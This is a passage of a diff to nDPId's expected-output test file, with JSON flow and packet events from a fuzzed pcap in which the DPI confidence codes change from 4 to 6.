-00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2081,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1120469540839,"flow_last_seen":1120470494876,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2242,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1120469540839,"flow_last_seen":1120470494876,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":2242,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1120470501450,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470501450,"pkt":"ADBUADRWAODtAW69CABFAABIa3QAAIARS93AqAECwKhDAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaSVzAHliZXJjaaqqqqqqqqqqqqo="} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":31074,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470501450,"flow_last_seen":1120470501450,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470501450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.67.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":31074,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1120470509447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470509447,"pkt":"ADBUADRWAODtAW69CABFAABEeHUAAIARS+DAqAECwKgBAQroADUAMOPqQOwAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509447,"flow_last_seen":1120470509447,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470509447,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2792,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1120470509449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470509449,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEB8KgBAgA1CugAR8ZmQOyAAABkAAEAAAAAATEBMAEwAzEyNwdpbi1hGmRyBGFycGEAAFcAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-a?dr.arpa","num_queries":100,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498,"global_ts_msec":1120470509599} 00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":454,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470509450,"pkt":"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"} 
00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":455,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470509450,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -862,20 +862,20 @@ 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470327552,"flow_last_seen":1120470336558,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2772,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1120469572981,"flow_last_seen":1120470509450,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":11994,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470542975,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1120470588783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470588783,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa3oAAO8RStPAqAECwKgBcACJAIkAOltehT0BEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ\/VDQUJNAAAoAAE="} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470588783,"flow_last_seen":1120470588783,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470588783,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.112","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1120470589532,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470589532,"pkt":"\/\/\/\/\/\/\/3AODtAW69CABFAABOa3sAAIARStLAiAECwKgB\/wCJAIkAOltehT0BEAABAAAAAAAAIERGRURFSkZQRUVFUEVORUNFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470589532,"flow_last_seen":1120470589532,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470589532,"l3_proto":"ip4","src_ip":"192.136.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":461,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470590283,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
